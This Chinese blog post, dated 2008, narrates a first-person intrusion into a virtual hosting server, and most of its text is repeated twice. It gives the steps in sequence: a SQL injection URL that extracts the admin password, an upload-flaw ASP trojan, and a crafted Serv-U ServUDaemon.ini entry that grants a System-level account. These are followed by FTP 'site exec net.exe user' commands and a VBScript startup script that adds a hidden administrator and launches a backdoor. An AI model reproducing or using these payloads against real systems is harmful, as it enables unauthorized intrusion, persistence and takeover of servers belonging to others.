黑客对一台虚拟主机服务器的渗透
互联网 发布时间:2008-10-08 19:38:32 作者:佚名
我要评论
前几天听一树说了惊云下载系统的漏洞
问题文件出在admin/user.asp
提交
http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
就相当于:
select * from UserInfo where user=’
前几天听一树说了惊云下载系统的漏洞
问题文件出在admin/user.asp
提交
http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
就相当于:
select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’" 利用access注入得到管理员密码
上面有一个文件upfile.htm
手工利用了下动网的upfile.asp漏洞
就成功上传了个asp木马
然后那个虚拟主机的c,d盘是NTFS分区
不能访问E盘装着servu,php,webmail,
F盘是虚拟站点
servu安装目录可写~
本来打算替换他servu文件的~但是觉的太麻烦
还容易让管理员怀疑
想起servu的本地提升来了 在自己计算机上装了个servu
添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里看ServUDaemon.ini
格式是这样的
[GLOBAL]
Version=5.0.0.11
LocalSetupPassword=072C63105200180D5C07170A7E3E
LocalSetupPortNo=60628
ProcessID=972
[DOMAINS]
Domain1=192.168.0.102||21|向导产生域|1|0|0
Domain2=192.168.0.102||2121|123|2|0|0
[Domain1]
User1=www|1|0
[USER=www|1]
Password=ih0C292E1AC82920B7F384007F302A1296
HomeDir=D:\xiaoben
TimeOut=600
Note1="Wizard generated account"
Access1=D:\xiaoben|RLPWAMCD
SKEYValues=
[Domain2]
User1=rover|1|0
User2=123|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
[USER=123|2]
Password=kv3F6EED70340AD1478ADF95963A07FD00
HomeDir=c:\
TimeOut=600
Access1=C:\|RWAMLCDP
SKEYValues=
----------------
其中rover用户就是我添加的那个
在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini
访照我本地的INI写进一个用户进去
User1=rover|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
保存~ 用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。
提示没有权限~郁闷~
但是我们有对C盘的访问权限了是不~hoho~
把后门(server.exe)传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0)
b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0)
b=wshshell.run ("cmd.exe /c server.exe",0) 存为HELP.vbe
这个教本的作用是修改tsinternetuser用户密码为rover1234
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本~
接下来就是等了~
等他登陆~
等了一段时间(看了一部蜘蛛侠的时间吧)~
连接后门~得到admin权限的shell
hoho~
接下来是善后工作了~就不说了
今天心情非常糟~有一些事情压的我喘不过气来
考试的时候当老师面把卷子撕了,然后扬步走了~
妈妈的~过程写的很乱~见谅
问题文件出在admin/user.asp
提交
http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
就相当于:
select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’" 利用access注入得到管理员密码
上面有一个文件upfile.htm
手工利用了下动网的upfile.asp漏洞
就成功上传了个asp木马
然后那个虚拟主机的c,d盘是NTFS分区
不能访问E盘装着servu,php,webmail,
F盘是虚拟站点
servu安装目录可写~
本来打算替换他servu文件的~但是觉的太麻烦
还容易让管理员怀疑
想起servu的本地提升来了 在自己计算机上装了个servu
添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里看ServUDaemon.ini
格式是这样的
[GLOBAL]
Version=5.0.0.11
LocalSetupPassword=072C63105200180D5C07170A7E3E
LocalSetupPortNo=60628
ProcessID=972
[DOMAINS]
Domain1=192.168.0.102||21|向导产生域|1|0|0
Domain2=192.168.0.102||2121|123|2|0|0
[Domain1]
User1=www|1|0
[USER=www|1]
Password=ih0C292E1AC82920B7F384007F302A1296
HomeDir=D:\xiaoben
TimeOut=600
Note1="Wizard generated account"
Access1=D:\xiaoben|RLPWAMCD
SKEYValues=
[Domain2]
User1=rover|1|0
User2=123|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
[USER=123|2]
Password=kv3F6EED70340AD1478ADF95963A07FD00
HomeDir=c:\
TimeOut=600
Access1=C:\|RWAMLCDP
SKEYValues=
----------------
其中rover用户就是我添加的那个
在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini
访照我本地的INI写进一个用户进去
User1=rover|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
保存~ 用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。
提示没有权限~郁闷~
但是我们有对C盘的访问权限了是不~hoho~
把后门(server.exe)传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0)
b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0)
b=wshshell.run ("cmd.exe /c server.exe",0) 存为HELP.vbe
这个教本的作用是修改tsinternetuser用户密码为rover1234
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本~
接下来就是等了~
等他登陆~
等了一段时间(看了一部蜘蛛侠的时间吧)~
连接后门~得到admin权限的shell
hoho~
接下来是善后工作了~就不说了
今天心情非常糟~有一些事情压的我喘不过气来
考试的时候当老师面把卷子撕了,然后扬步走了~
妈妈的~过程写的很乱~见谅
相关文章
CC主要是用来攻击页面的,大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,对不?!一般来说,访问的人越多,论坛的页2024-01-06
入侵者主要通过Potato程序攻击拥有SYSTEM权限的端口伪造网络身份认证过程,利用NTLM重放机制骗取SYSTEM身份令牌,最终取得系统权限,该安全风险微软并不认为存在漏洞,所以2021-04-15
这篇文章主要介绍了文件上传漏洞全面渗透分析小结,这里主要为大家分享一下防御方法,需要的朋友可以参考下2021-03-21- 这篇文章主要介绍了sql手工注入语句&SQL手工注入大全,需要的朋友可以参考下2017-09-06
- 这篇文章主要介绍了详解Filezilla server 提权,需要的朋友可以参考下2017-05-13
FileZilla Server 2008 x64 提权与防御方法
这篇文章主要介绍了FileZilla Server 2008 x64 提权与防御方法,需要的朋友可以参考下2017-05-13- 不久之前我们说过关于http和https的区别,对于加密的https,我们一直认为它是相对安全的,可今天要讲的是,一种绕过HTTPS加密得到明文信息的web攻击方式,不知道这消息对你2016-08-10
iPhone和Mac也会被黑 一条iMessage密码可能就被盗了
一直以来苹果系统的安全性都是比安卓要高的,但是再安全的系统也免不了漏洞,苹果也一样。最近爆出的新漏洞,只需要接收一条多媒体信息或者iMessage就会导致用户信息泄露。2016-07-27- 国家正在修正关于黑客方面的法律法规,有一条震惊黑客圈的“世纪佳缘”起诉白帽黑客事件,深深的伤害了广大黑客们的心,加上扎克伯格和特拉维斯·卡兰尼克账号被盗,于是黑2016-07-11
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
面对恶意邮件攻击,我们就只能默默忍受被他攻击,连自我保护能力都没有谈什么反抗?让人痛快的是,如今有了解决办法,逆向破解键盘记录器,进入攻击者邮箱2016-07-06



最新评论